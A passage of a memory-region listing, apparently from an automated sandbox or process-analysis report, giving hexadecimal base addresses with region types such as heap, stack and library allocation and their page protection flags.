heap
|
page read and write
|
||
1C7B7547000
|
heap
|
page read and write
|
||
1C7B73F3000
|
heap
|
page read and write
|
||
7FFD332B0000
|
trusted library allocation
|
page read and write
|
||
1C7B76AB000
|
heap
|
page read and write
|
||
18721F5B000
|
heap
|
page read and write
|
||
276C0D70000
|
heap
|
page read and write
|
||
7FFD9E840000
|
unkown
|
page readonly
|
||
209D9330000
|
heap
|
page read and write
|
||
1F4C70A4000
|
heap
|
page read and write
|
||
1FAB4F6E000
|
heap
|
page read and write
|
||
7FFDA3435000
|
unkown
|
page execute and read and write
|
||
18B48E91000
|
heap
|
page read and write
|
||
1C7B73E3000
|
heap
|
page read and write
|
||
18B48BA8000
|
heap
|
page read and write
|
||
218F1410000
|
heap
|
page read and write
|
||
9D33E7C000
|
stack
|
page read and write
|
||
CAD29DF000
|
stack
|
page read and write
|
||
7FFD944E3000
|
unkown
|
page execute and write copy
|
||
1C7B7A22000
|
heap
|
page read and write
|
||
231D8BCE000
|
heap
|
page read and write
|
||
18B490E9000
|
heap
|
page read and write
|
||
18B497BF000
|
heap
|
page read and write
|
||
7FF7B2BA4000
|
unkown
|
page readonly
|
||
18B47B9E000
|
heap
|
page read and write
|
||
1FAB36DF000
|
heap
|
page read and write
|
||
18B49A1A000
|
heap
|
page read and write
|
||
7FFDA3472000
|
unkown
|
page read and write
|
||
15ABB729000
|
heap
|
page read and write
|
||
2909FBC7000
|
heap
|
page read and write
|
||
18B49BBE000
|
heap
|
page read and write
|
||
7FF7B2B61000
|
unkown
|
page execute read
|
||
E8E79FE000
|
unkown
|
page read and write
|
||
2797DB00000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
18B49064000
|
heap
|
page read and write
|
||
18B48491000
|
heap
|
page read and write
|
||
1FAB36D0000
|
heap
|
page read and write
|
||
1F788F10000
|
heap
|
page read and write
|
||
215AB69A000
|
heap
|
page read and write
|
||
18B48C86000
|
heap
|
page read and write
|
||
230CA418000
|
heap
|
page read and write
|
||
18721FA2000
|
heap
|
page read and write
|
||
C8307F000
|
stack
|
page read and write
|
||
18B4944D000
|
heap
|
page read and write
|
||
1C1C2FE000
|
stack
|
page read and write
|
||
231D6CA0000
|
trusted library allocation
|
page read and write
|
||
1FAB2F0C000
|
heap
|
page read and write
|
||
18B497C9000
|
heap
|
page read and write
|
||
2302ED5A000
|
heap
|
page read and write
|
||
231D6D1A000
|
heap
|
page read and write
|
||
2B2277C2000
|
heap
|
page read and write
|
||
243739F8000
|
heap
|
page read and write
|
||
218F1A10000
|
heap
|
page read and write
|
||
7FFD33114000
|
trusted library allocation
|
page read and write
|
||
22048DE1000
|
heap
|
page read and write
|
||
18B49E65000
|
heap
|
page read and write
|
||
215AB6AB000
|
heap
|
page read and write
|
||
8BCD0FF000
|
unkown
|
page read and write
|
||
1F78AEE3000
|
heap
|
page read and write
|
||
18B47386000
|
heap
|
page read and write
|
||
7FFD330D0000
|
trusted library allocation
|
page read and write
|
||
18B49402000
|
heap
|
page read and write
|
||
7FFDA36E1000
|
unkown
|
page execute and read and write
|
||
133E1207000
|
heap
|
page read and write
|
||
205C8DC0000
|
heap
|
page read and write
|
||
260C120C000
|
trusted library allocation
|
page read and write
|
||
215AB349000
|
heap
|
page read and write
|
||
2797DB3A000
|
heap
|
page read and write
|
||
18723E3E000
|
heap
|
page read and write
|
||
1C7B7A0C000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
2909FBED000
|
heap
|
page read and write
|
||
18B49A17000
|
heap
|
page read and write
|
||
215ABA1C000
|
heap
|
page read and write
|
||
1C7B7390000
|
heap
|
page read and write
|
||
215AB280000
|
heap
|
page read and write
|
||
1C7B73E1000
|
heap
|
page read and write
|
||
1CBB6D24000
|
heap
|
page read and write
|
||
9D33F7F000
|
stack
|
page read and write
|
||
215AB9F8000
|
heap
|
page read and write
|
||
215AB260000
|
heap
|
page read and write
|
||
19350B3A000
|
heap
|
page read and write
|
||
18B45171000
|
heap
|
page read and write
|
||
D6F52FF000
|
stack
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
2BD8672F000
|
heap
|
page read and write
|
||
18B47B0B000
|
heap
|
page read and write
|
||
1C7B92C4000
|
heap
|
page read and write
|
||
18B47ABA000
|
heap
|
page read and write
|
||
18B45198000
|
heap
|
page read and write
|
||
1FAB2E20000
|
heap
|
page read and write
|
||
FD2CBF9000
|
stack
|
page read and write
|
||
133E1200000
|
heap
|
page read and write
|
||
2239CA50000
|
heap
|
page read and write
|
||
215ABA22000
|
heap
|
page read and write
|
||
A391FDE000
|
stack
|
page read and write
|
||
18B4944F000
|
heap
|
page read and write
|
||
18B4519E000
|
heap
|
page read and write
|
||
DEA8DFE000
|
unkown
|
page read and write
|
||
18B4519C000
|
heap
|
page read and write
|
||
215AB318000
|
heap
|
page read and write
|
||
1FAB36F1000
|
heap
|
page read and write
|
||
18B48BC6000
|
heap
|
page read and write
|
||
24D95C60000
|
heap
|
page read and write
|
||
1FAB2F07000
|
heap
|
page read and write
|
||
205C8BF5000
|
heap
|
page read and write
|
||
2BD86723000
|
heap
|
page read and write
|
||
1C7B92D5000
|
heap
|
page read and write
|
||
18B497B8000
|
heap
|
page read and write
|
||
209D92F0000
|
heap
|
page read and write
|
||
36231CE000
|
stack
|
page read and write
|
||
2245C170000
|
heap
|
page read and write
|
||
218F155C000
|
heap
|
page read and write
|
||
231D72E8000
|
heap
|
page read and write
|
||
1C7B740A000
|
heap
|
page read and write
|
||
2797DCE0000
|
heap
|
page read and write
|
||
2239CC00000
|
heap
|
page read and write
|
||
215AB693000
|
heap
|
page read and write
|
||
1F788F79000
|
heap
|
page read and write
|
||
215AB340000
|
heap
|
page read and write
|
||
18B45175000
|
heap
|
page read and write
|
||
2BD86731000
|
heap
|
page read and write
|
||
2909FBFD000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
18B476B3000
|
heap
|
page read and write
|
||
7FFD9DEB1000
|
unkown
|
page execute and read and write
|
||
2797DB4D000
|
heap
|
page read and write
|
||
18B4519D000
|
heap
|
page read and write
|
||
18B47A0B000
|
heap
|
page read and write
|
||
2BD8672E000
|
heap
|
page read and write
|
||
1872259E000
|
heap
|
page read and write
|
||
1C7B92C2000
|
heap
|
page read and write
|
||
231D72CC000
|
heap
|
page read and write
|
||
205C8BD0000
|
heap
|
page read and write
|
||
255A2950000
|
heap
|
page read and write
|
||
1C7B7544000
|
heap
|
page read and write
|
||
187225BA000
|
heap
|
page read and write
|
||
1F78AEF6000
|
heap
|
page read and write
|
||
24D95D71000
|
heap
|
page read and write
|
||
215AB697000
|
heap
|
page read and write
|
||
2909FBC7000
|
heap
|
page read and write
|
||
18B48D90000
|
direct allocation
|
page read and write
|
||
18B497C8000
|
heap
|
page read and write
|
||
1F789264000
|
heap
|
page read and write
|
||
7FFDA549C000
|
unkown
|
page read and write
|
||
1F788FAE000
|
heap
|
page read and write
|
||
18B47A89000
|
heap
|
page read and write
|
||
18B47B87000
|
heap
|
page read and write
|
||
1C7B76A0000
|
heap
|
page read and write
|
||
18B4855C000
|
heap
|
page read and write
|
||
1651FEB0000
|
heap
|
page read and write
|
||
1F4C6E09000
|
heap
|
page read and write
|
||
5B3E7F000
|
stack
|
page read and write
|
||
1F78926B000
|
heap
|
page read and write
|
||
18B47A63000
|
heap
|
page read and write
|
||
3C891FE000
|
stack
|
page read and write
|
||
231D6CF5000
|
heap
|
page read and write
|
||
215AD35E000
|
heap
|
page read and write
|
||
1FAB2EE8000
|
heap
|
page read and write
|
||
18387EB6000
|
heap
|
page read and write
|
||
218F152A000
|
heap
|
page read and write
|
||
1FAB2F1F000
|
heap
|
page read and write
|
||
1F788FAB000
|
heap
|
page read and write
|
||
28DDB927000
|
heap
|
page read and write
|
||
231D72E9000
|
heap
|
page read and write
|
||
7FFDA0875000
|
unkown
|
page read and write
|
||
18B46E70000
|
direct allocation
|
page read and write
|
||
1FAB323D000
|
heap
|
page read and write
|
||
1C7B92CF000
|
heap
|
page read and write
|
||
260C28E4000
|
trusted library allocation
|
page read and write
|
||
215AB9FF000
|
heap
|
page read and write
|
||
2BD8672C000
|
heap
|
page read and write
|
||
1091ED90000
|
heap
|
page read and write
|
||
FD2D84D000
|
stack
|
page read and write
|
||
18721FFA000
|
heap
|
page read and write
|
||
18B4798C000
|
heap
|
page read and write
|
||
2768FE000
|
unkown
|
page read and write
|
||
23F537C0000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
18B490A8000
|
heap
|
page read and write
|
||
260D1190000
|
trusted library allocation
|
page read and write
|
||
18B48732000
|
heap
|
page read and write
|
||
205C8C07000
|
heap
|
page read and write
|
||
1091EB40000
|
heap
|
page read and write
|
||
19350C80000
|
heap
|
page read and write
|
||
205C8C19000
|
heap
|
page read and write
|
||
1091EB63000
|
heap
|
page read and write
|
||
1838806A000
|
heap
|
page read and write
|
||
22125EE0000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
232DEBC4000
|
heap
|
page read and write
|
||
18B49A17000
|
heap
|
page read and write
|
||
1C7B7A09000
|
heap
|
page read and write
|
||
18B49D53000
|
heap
|
page read and write
|
||
18B472D1000
|
heap
|
page read and write
|
||
C85BB2D000
|
stack
|
page read and write
|
||
18388062000
|
heap
|
page read and write
|
||
18B47B59000
|
heap
|
page read and write
|
||
260BF28F000
|
heap
|
page read and write
|
||
18B49D7E000
|
heap
|
page read and write
|
||
18722442000
|
heap
|
page read and write
|
||
18B477B0000
|
direct allocation
|
page read and write
|
||
18B45143000
|
heap
|
page read and write
|
||
22125EEA000
|
heap
|
page read and write
|
||
18B47B87000
|
heap
|
page read and write
|
||
1CCF66B0000
|
heap
|
page read and write
|
||
2F532470000
|
heap
|
page read and write
|
||
215AB690000
|
heap
|
page read and write
|
||
2909FBD8000
|
heap
|
page read and write
|
||
1F789674000
|
heap
|
page read and write
|
||
18B475CA000
|
heap
|
page read and write
|
||
1F7892F4000
|
heap
|
page read and write
|
||
1FAB36F9000
|
heap
|
page read and write
|
||
18B49B2B000
|
heap
|
page read and write
|
||
231D8BD5000
|
heap
|
page read and write
|
||
1F788FB6000
|
heap
|
page read and write
|
||
18B48BC6000
|
heap
|
page read and write
|
||
18B4859D000
|
heap
|
page read and write
|
||
18B498ED000
|
heap
|
page read and write
|
||
A7DCAFC000
|
stack
|
page read and write
|
||
1C7B92C3000
|
heap
|
page read and write
|
||
18B450E4000
|
heap
|
page read and write
|
||
5F047FF000
|
stack
|
page read and write
|
||
18B475CB000
|
heap
|
page read and write
|
||
7FFD33190000
|
trusted library allocation
|
page read and write
|
||
18B47BA0000
|
heap
|
page read and write
|
||
1FAB36E8000
|
heap
|
page read and write
|
||
18387F6E000
|
heap
|
page read and write
|
||
18B47AA1000
|
heap
|
page read and write
|
||
18387F1E000
|
heap
|
page read and write
|
||
24C59D30000
|
heap
|
page read and write
|
||
18B48A0D000
|
heap
|
page read and write
|
||
1C7B73CE000
|
heap
|
page read and write
|
||
1F788EA0000
|
heap
|
page read and write
|
||
231D72F1000
|
heap
|
page read and write
|
||
7FF7B2B8B000
|
unkown
|
page readonly
|
||
18387F79000
|
heap
|
page read and write
|
||
18B49A1A000
|
heap
|
page read and write
|
||
23F537C7000
|
heap
|
page read and write
|
||
7FFD943C4000
|
unkown
|
page execute and read and write
|
||
18B450C0000
|
heap
|
page read and write
|
||
7FFDA5491000
|
unkown
|
page execute and read and write
|
||
165201F4000
|
heap
|
page read and write
|
||
7FFD93D01000
|
unkown
|
page execute and read and write
|
||
18387F5C000
|
heap
|
page read and write
|
||
1F789669000
|
heap
|
page read and write
|
||
231D72E8000
|
heap
|
page read and write
|
||
18721FE6000
|
heap
|
page read and write
|
||
18722447000
|
heap
|
page read and write
|
||
218F1A00000
|
heap
|
page read and write
|
||
18B49D13000
|
heap
|
page read and write
|
||
18B47307000
|
heap
|
page read and write
|
||
1FAB36F4000
|
heap
|
page read and write
|
||
231D8BD6000
|
heap
|
page read and write
|
||
260C2523000
|
trusted library allocation
|
page read and write
|
||
18B45171000
|
heap
|
page read and write
|
||
231D8BC1000
|
heap
|
page read and write
|
||
231D6D13000
|
heap
|
page read and write
|
||
1C7B73A7000
|
heap
|
page read and write
|
||
18B497C8000
|
heap
|
page read and write
|
||
7FFD93D05000
|
unkown
|
page execute and write copy
|
||
18B49524000
|
heap
|
page read and write
|
||
1CBB6AC6000
|
heap
|
page read and write
|
||
260BF210000
|
heap
|
page read and write
|
||
187225BA000
|
heap
|
page read and write
|
||
260C0C30000
|
heap
|
page read and write
|
||
18387E00000
|
heap
|
page read and write
|
||
1838806E000
|
heap
|
page read and write
|
||
1C7B7A25000
|
heap
|
page read and write
|
||
215AB2A0000
|
trusted library allocation
|
page read and write
|
||
18B498CD000
|
heap
|
page read and write
|
||
215AB344000
|
heap
|
page read and write
|
||
18387F15000
|
heap
|
page read and write
|
||
2B227A90000
|
heap
|
page read and write
|
||
7BF6CFF000
|
stack
|
page read and write
|
||
215AB320000
|
heap
|
page read and write
|
||
215AB9F0000
|
heap
|
page read and write
|
||
187225AE000
|
heap
|
page read and write
|
||
7FFDA4340000
|
unkown
|
page execute and read and write
|
||
1FAB2E90000
|
heap
|
page read and write
|
||
1F789262000
|
heap
|
page read and write
|
||
18387F6E000
|
heap
|
page read and write
|
||
7FFD332A0000
|
trusted library allocation
|
page read and write
|
||
18B49755000
|
heap
|
page read and write
|
||
1C1C078000
|
stack
|
page read and write
|
||
209D9430000
|
heap
|
page read and write
|
||
1651FE90000
|
heap
|
page read and write
|
||
218F1590000
|
heap
|
page read and write
|
||
215AB69B000
|
heap
|
page read and write
|
||
64B227F000
|
stack
|
page read and write
|
||
1F788F40000
|
heap
|
page read and write
|
||
7FF7B2B8B000
|
unkown
|
page readonly
|
||
DEA8CFC000
|
stack
|
page read and write
|
||
18B47625000
|
heap
|
page read and write
|
||
9AD2BFE000
|
stack
|
page read and write
|
||
231D6D04000
|
heap
|
page read and write
|
||
BC082FC000
|
stack
|
page read and write
|
||
7FFDA54BC000
|
unkown
|
page execute and write copy
|
||
18B4778D000
|
heap
|
page read and write
|
||
209D934A000
|
heap
|
page read and write
|
||
7FFD93BE9000
|
unkown
|
page read and write
|
||
1F788FB7000
|
heap
|
page read and write
|
||
18B45175000
|
heap
|
page read and write
|
||
231D6E00000
|
trusted library allocation
|
page read and write
|
||
3C8917E000
|
stack
|
page read and write
|
||
19424DC0000
|
heap
|
page read and write
|
||
18B45177000
|
heap
|
page read and write
|
||
1F4C6DB0000
|
heap
|
page read and write
|
||
1F788FBF000
|
heap
|
page read and write
|
||
18721FCD000
|
heap
|
page read and write
|
||
18B451B6000
|
heap
|
page read and write
|
||
1F7892FB000
|
heap
|
page read and write
|
||
2BD86610000
|
heap
|
page read and write
|
||
18B497B8000
|
heap
|
page read and write
|
||
260D9332000
|
heap
|
page read and write
|
||
7FFD330F0000
|
trusted library allocation
|
page execute and read and write
|
||
1FAB2EE8000
|
heap
|
page read and write
|
||
18387F86000
|
heap
|
page read and write
|
||
18B472C1000
|
heap
|
page read and write
|
||
2F532370000
|
heap
|
page read and write
|
||
AED71FF000
|
unkown
|
page read and write
|
||
7FFD94090000
|
unkown
|
page readonly
|
||
1CBB6AA0000
|
heap
|
page read and write
|
||
7FFD93F8A000
|
unkown
|
page execute and read and write
|
||
18B47384000
|
heap
|
page read and write
|
||
260D9310000
|
heap
|
page read and write
|
||
18B485A0000
|
heap
|
page read and write
|
||
231D6CEA000
|
heap
|
page read and write
|
||
18B47674000
|
heap
|
page read and write
|
||
24373C60000
|
heap
|
page read and write
|
||
453F5CC000
|
stack
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
1FAB36CC000
|
heap
|
page read and write
|
||
17B1B334000
|
heap
|
page read and write
|
||
255A297D000
|
heap
|
page read and write
|
||
1651FFCA000
|
heap
|
page read and write
|
||
17B1B111000
|
heap
|
page read and write
|
||
18B49D55000
|
heap
|
page read and write
|
||
18B45183000
|
heap
|
page read and write
|
||
2245C3C0000
|
heap
|
page read and write
|
||
18387DD0000
|
trusted library allocation
|
page read and write
|
||
18388094000
|
heap
|
page read and write
|
||
2909FB30000
|
heap
|
page read and write
|
||
18387F82000
|
heap
|
page read and write
|
||
7FFD9DF7A000
|
unkown
|
page execute and read and write
|
||
18B48120000
|
direct allocation
|
page read and write
|
||
7FFDA3561000
|
unkown
|
page execute and read and write
|
||
1FAB314A000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
1FAB2F15000
|
heap
|
page read and write
|
||
1FAB4F60000
|
heap
|
page read and write
|
||
1CBB6AE1000
|
heap
|
page read and write
|
||
18B47368000
|
heap
|
page read and write
|
||
1BC539D000
|
stack
|
page read and write
|
||
18B49E2D000
|
heap
|
page read and write
|
||
5F043BB000
|
stack
|
page read and write
|
||
18B48826000
|
heap
|
page read and write
|
||
205C8A10000
|
heap
|
page read and write
|
||
18B49A75000
|
heap
|
page read and write
|
||
18387DD0000
|
trusted library allocation
|
page read and write
|
||
1C7B73FB000
|
heap
|
page read and write
|
||
A7DCCFF000
|
stack
|
page read and write
|
||
1BC56FF000
|
stack
|
page read and write
|
||
24373A02000
|
heap
|
page read and write
|
||
260C0B00000
|
heap
|
page readonly
|
||
AED72FF000
|
stack
|
page read and write
|
||
7FFD9DF75000
|
unkown
|
page execute and read and write
|
||
243738E0000
|
heap
|
page read and write
|
||
18B495CA000
|
heap
|
page read and write
|
||
18B48868000
|
heap
|
page read and write
|
||
DDD1B5D000
|
stack
|
page read and write
|
||
23F53A00000
|
heap
|
page read and write
|
||
1C7B741C000
|
heap
|
page read and write
|
||
18B451B3000
|
heap
|
page read and write
|
||
22126134000
|
heap
|
page read and write
|
||
18387F5F000
|
heap
|
page read and write
|
||
19350B53000
|
heap
|
page read and write
|
||
18B49513000
|
heap
|
page read and write
|
||
260D92E7000
|
heap
|
page execute and read and write
|
||
7FFD33260000
|
trusted library allocation
|
page read and write
|
||
18B497D8000
|
heap
|
page read and write
|
||
18B475C3000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
7FFDA355D000
|
unkown
|
page read and write
|
||
231D6CF7000
|
heap
|
page read and write
|
||
215AB2EE000
|
heap
|
page read and write
|
||
1C1C27E000
|
stack
|
page read and write
|
||
7FFD9DEE6000
|
unkown
|
page read and write
|
||
133E1210000
|
heap
|
page read and write
|
||
18B497DD000
|
heap
|
page read and write
|
||
1C7B92D5000
|
heap
|
page read and write
|
||
276C0AA8000
|
heap
|
page read and write
|
||
133E11A0000
|
heap
|
page read and write
|
||
7FFDA3531000
|
unkown
|
page execute and read and write
|
||
18721F90000
|
heap
|
page read and write
|
||
2797DB4D000
|
heap
|
page read and write
|
||
18387EA3000
|
heap
|
page read and write
|
||
187225A7000
|
heap
|
page read and write
|
||
D3B34FE000
|
stack
|
page read and write
|
||
1FAB4F61000
|
heap
|
page read and write
|
||
215ABA04000
|
heap
|
page read and write
|
||
215ABA01000
|
heap
|
page read and write
|
||
1C7B74B0000
|
heap
|
page read and write
|
||
1651FFDC000
|
heap
|
page read and write
|
||
1F789668000
|
heap
|
page read and write
|
||
26207654000
|
heap
|
page read and write
|
||
7FFD93BF0000
|
unkown
|
page readonly
|
||
18B48733000
|
heap
|
page read and write
|
||
18B45100000
|
heap
|
page read and write
|
||
2B227770000
|
heap
|
page read and write
|
||
260C2E37000
|
trusted library allocation
|
page read and write
|
||
2BD86725000
|
heap
|
page read and write
|
||
215AB69E000
|
heap
|
page read and write
|
||
18B48BD7000
|
heap
|
page read and write
|
||
C85BE7E000
|
stack
|
page read and write
|
||
1AB93EE0000
|
heap
|
page read and write
|
||
276C0A10000
|
heap
|
page read and write
|
||
2BE10D10000
|
heap
|
page read and write
|
||
18B45143000
|
heap
|
page read and write
|
||
7FFD32F8C000
|
trusted library allocation
|
page execute and read and write
|
||
A1321FF000
|
stack
|
page read and write
|
||
B6FAAFF000
|
unkown
|
page read and write
|
||
1F789671000
|
heap
|
page read and write
|
||
222B2FF000
|
stack
|
page read and write
|
||
18B4519F000
|
heap
|
page read and write
|
||
1FAB2F1E000
|
heap
|
page read and write
|
||
7FF7B2BA2000
|
unkown
|
page read and write
|
||
260BF287000
|
heap
|
page read and write
|
||
1F78964E000
|
heap
|
page read and write
|
||
10E3A9F0000
|
heap
|
page read and write
|
||
21D1AFE000
|
stack
|
page read and write
|
||
86990FE000
|
stack
|
page read and write
|
||
1CBB6AFC000
|
heap
|
page read and write
|
||
7FFD93F5F000
|
unkown
|
page execute and read and write
|
||
1FAB4F74000
|
heap
|
page read and write
|
||
7FFD93CFB000
|
unkown
|
page execute and read and write
|
||
18B4996E000
|
heap
|
page read and write
|
||
79AA31B000
|
stack
|
page read and write
|
||
2797DB38000
|
heap
|
page read and write
|
||
1C7B73ED000
|
heap
|
page read and write
|
||
21D1A7E000
|
stack
|
page read and write
|
||
231D72F4000
|
heap
|
page read and write
|
||
7FFDA36B4000
|
unkown
|
page execute and read and write
|
||
1F789265000
|
heap
|
page read and write
|
||
18B4798E000
|
heap
|
page read and write
|
||
2BD8672C000
|
heap
|
page read and write
|
||
3C88D67000
|
stack
|
page read and write
|
||
18721FD2000
|
heap
|
page read and write
|
||
2BD86708000
|
heap
|
page read and write
|
||
5F0477E000
|
stack
|
page read and write
|
||
1FAB2E40000
|
heap
|
page read and write
|
||
215AB324000
|
heap
|
page read and write
|
||
1F788FAC000
|
heap
|
page read and write
|
||
18B49974000
|
heap
|
page read and write
|
||
215AB33F000
|
heap
|
page read and write
|
||
2BD86730000
|
heap
|
page read and write
|
||
1FAB2E60000
|
trusted library allocation
|
page read and write
|
||
7FFDA3463000
|
unkown
|
page execute and read and write
|
||
7FFDA3711000
|
unkown
|
page execute and read and write
|
||
1C7B92CF000
|
heap
|
page read and write
|
||
1C7B73A2000
|
heap
|
page read and write
|
||
24C59C50000
|
heap
|
page read and write
|
||
142EA020000
|
heap
|
page read and write
|
||
18723E30000
|
heap
|
page read and write
|
||
232DE840000
|
heap
|
page read and write
|
||
C830FF000
|
stack
|
page read and write
|
||
2BD8672D000
|
heap
|
page read and write
|
||
2B2277C2000
|
heap
|
page read and write
|
||
1FF04180000
|
heap
|
page read and write
|
||
18B497DC000
|
heap
|
page read and write
|
||
18B4798C000
|
heap
|
page read and write
|
||
18B47A05000
|
heap
|
page read and write
|
||
18B4519E000
|
heap
|
page read and write
|
||
2797DB28000
|
heap
|
page read and write
|
||
231D6D04000
|
heap
|
page read and write
|
||
1FF03E10000
|
heap
|
page read and write
|
||
231D6D0B000
|
heap
|
page read and write
|
||
1AB93FD9000
|
heap
|
page read and write
|
||
7FFD93BDE000
|
unkown
|
page execute and read and write
|
||
18B48628000
|
heap
|
page read and write
|
||
1CCF68E0000
|
heap
|
page read and write
|
||
7FF7B2B61000
|
unkown
|
page execute read
|
||
7BF6B7E000
|
stack
|
page read and write
|
||
7FFD944A9000
|
unkown
|
page execute and read and write
|
||
231D6D13000
|
heap
|
page read and write
|
||
52AA17F000
|
stack
|
page read and write
|
||
218F154B000
|
heap
|
page read and write
|
||
1102CFF000
|
stack
|
page read and write
|
||
7FFD93D11000
|
unkown
|
page execute and read and write
|
||
260BF240000
|
heap
|
page read and write
|
||
260C2815000
|
trusted library allocation
|
page read and write
|
||
1F788FA7000
|
heap
|
page read and write
|
||
18B451AE000
|
heap
|
page read and write
|
||
18B47A74000
|
heap
|
page read and write
|
||
1FAB2F05000
|
heap
|
page read and write
|
||
1F788F7F000
|
heap
|
page read and write
|
||
18387E90000
|
heap
|
page read and write
|
||
1091EB64000
|
heap
|
page read and write
|
||
7FFD93D07000
|
unkown
|
page read and write
|
||
1C7B754E000
|
heap
|
page read and write
|
||
18B49CB9000
|
heap
|
page read and write
|
||
26207650000
|
heap
|
page read and write
|
||
18B450A0000
|
heap
|
page read and write
|
||
1651FF90000
|
heap
|
page read and write
|
||
1C1C1FE000
|
stack
|
page read and write
|
||
621DBE000
|
stack
|
page read and write
|
||
231D72A0000
|
heap
|
page read and write
|
||
1F4C70A5000
|
heap
|
page read and write
|
||
2239C920000
|
heap
|
page read and write
|
||
7FFD94053000
|
unkown
|
page execute and read and write
|
||
2797DB2E000
|
heap
|
page read and write
|
||
18B4937D000
|
heap
|
page read and write
|
||
1F78AEE1000
|
heap
|
page read and write
|
||
1F7892F0000
|
heap
|
page read and write
|
||
18B45106000
|
heap
|
page read and write
|
||
230CA7A0000
|
heap
|
page read and write
|
||
1C7B7490000
|
heap
|
page read and write
|
||
1F788F96000
|
heap
|
page read and write
|
||
215AB322000
|
heap
|
page read and write
|
||
18B491F1000
|
heap
|
page read and write
|
||
DDD1BDE000
|
stack
|
page read and write
|
||
1838809B000
|
heap
|
page read and write
|
||
231D72C7000
|
heap
|
page read and write
|
||
18B48BD8000
|
heap
|
page read and write
|
||
230F89D0000
|
heap
|
page read and write
|
||
205C8BF6000
|
heap
|
page read and write
|
||
18B48BE6000
|
heap
|
page read and write
|
||
1F78926A000
|
heap
|
page read and write
|
||
F868AFF000
|
stack
|
page read and write
|
||
231D72D1000
|
heap
|
page read and write
|
||
1091EB20000
|
heap
|
page read and write
|
||
18B475CD000
|
heap
|
page read and write
|
||
16FD0050000
|
heap
|
page read and write
|
||
18B4937E000
|
heap
|
page read and write
|
||
17B1B111000
|
heap
|
page read and write
|
||
1FAB3230000
|
heap
|
page read and write
|
||
18721F00000
|
trusted library allocation
|
page read and write
|
||
A7DCBFF000
|
unkown
|
page read and write
|
||
18B48B5F000
|
heap
|
page read and write
|
||
A391F5E000
|
stack
|
page read and write
|
||
18B472FA000
|
heap
|
page read and write
|
||
1091EB69000
|
heap
|
page read and write
|
||
18387F35000
|
heap
|
page read and write
|
||
7FFD9F3C1000
|
unkown
|
page execute and read and write
|
||
18B4981F000
|
heap
|
page read and write
|
||
18B48C7B000
|
heap
|
page read and write
|
||
18387EEF000
|
heap
|
page read and write
|
||
18B478B0000
|
heap
|
page read and write
|
||
18B4799C000
|
heap
|
page read and write
|
||
1872244B000
|
heap
|
page read and write
|
||
1F78965C000
|
heap
|
page read and write
|
||
1CBB6AED000
|
heap
|
page read and write
|
||
18B4799B000
|
heap
|
page read and write
|
||
2BD86727000
|
heap
|
page read and write
|
||
8698E77000
|
stack
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
7FFD94060000
|
unkown
|
page execute and read and write
|
||
2BD8672C000
|
heap
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
18B49A75000
|
heap
|
page read and write
|
||
18B475B2000
|
heap
|
page read and write
|
||
1F78926A000
|
heap
|
page read and write
|
||
18B4519F000
|
heap
|
page read and write
|
||
231D6DF0000
|
heap
|
page read and write
|
||
18B475B0000
|
heap
|
page read and write
|
||
24373A02000
|
heap
|
page read and write
|
||
7FFDA4348000
|
unkown
|
page read and write
|
||
18B47C8E000
|
heap
|
page read and write
|
||
1FAB36E8000
|
heap
|
page read and write
|
||
2909FB50000
|
heap
|
page read and write
|
||
18B47C94000
|
heap
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
FC7687F000
|
stack
|
page read and write
|
||
1C7B74D0000
|
trusted library allocation
|
page read and write
|
||
1F788F93000
|
heap
|
page read and write
|
||
231D7157000
|
heap
|
page read and write
|
||
10E3AAD0000
|
heap
|
page read and write
|
||
260BF306000
|
heap
|
page read and write
|
||
362347F000
|
stack
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
18B48B65000
|
heap
|
page read and write
|
||
1C7B740B000
|
heap
|
page read and write
|
||
18B47312000
|
heap
|
page read and write
|
||
215AB33A000
|
heap
|
page read and write
|
||
18B4518B000
|
heap
|
page read and write
|
||
15ABB630000
|
heap
|
page read and write
|
||
28DDB920000
|
heap
|
page read and write
|
||
215AB34C000
|
heap
|
page read and write
|
||
64B1FEE000
|
stack
|
page read and write
|
||
18B49233000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
1C7B73E9000
|
heap
|
page read and write
|
||
18B4859D000
|
heap
|
page read and write
|
||
7FFD330E1000
|
trusted library allocation
|
page read and write
|
||
553007F000
|
stack
|
page read and write
|
||
1F788FAF000
|
heap
|
page read and write
|
||
231D6BA0000
|
heap
|
page read and write
|
||
18387E89000
|
heap
|
page read and write
|
||
276C0AB5000
|
heap
|
page read and write
|
||
18721FF4000
|
heap
|
page read and write
|
||
18B47B0B000
|
heap
|
page read and write
|
||
1D25C8C0000
|
heap
|
page read and write
|
||
18B49D74000
|
heap
|
page read and write
|
||
7FFDA4160000
|
unkown
|
page readonly
|
||
7FFD9DFE8000
|
unkown
|
page execute and read and write
|
||
18B49B0A000
|
heap
|
page read and write
|
||
18722002000
|
heap
|
page read and write
|
||
187225BA000
|
heap
|
page read and write
|
||
1F4C6E11000
|
heap
|
page read and write
|
||
18B4A1C1000
|
heap
|
page read and write
|
||
F9F7F7F000
|
stack
|
page read and write
|
||
16FD0020000
|
heap
|
page read and write
|
||
895A5CE000
|
stack
|
page read and write
|
||
230F88F0000
|
heap
|
page read and write
|
||
1F788F53000
|
heap
|
page read and write
|
||
2239CA20000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
231D72E8000
|
heap
|
page read and write
|
||
18B48490000
|
heap
|
page read and write
|
||
218F1406000
|
heap
|
page read and write
|
||
2909FBCD000
|
heap
|
page read and write
|
||
18B49402000
|
heap
|
page read and write
|
||
9AD2C7E000
|
stack
|
page read and write
|
||
18387EAF000
|
heap
|
page read and write
|
||
276C0AB5000
|
heap
|
page read and write
|
||
18722447000
|
heap
|
page read and write
|
||
1F4C6E11000
|
heap
|
page read and write
|
||
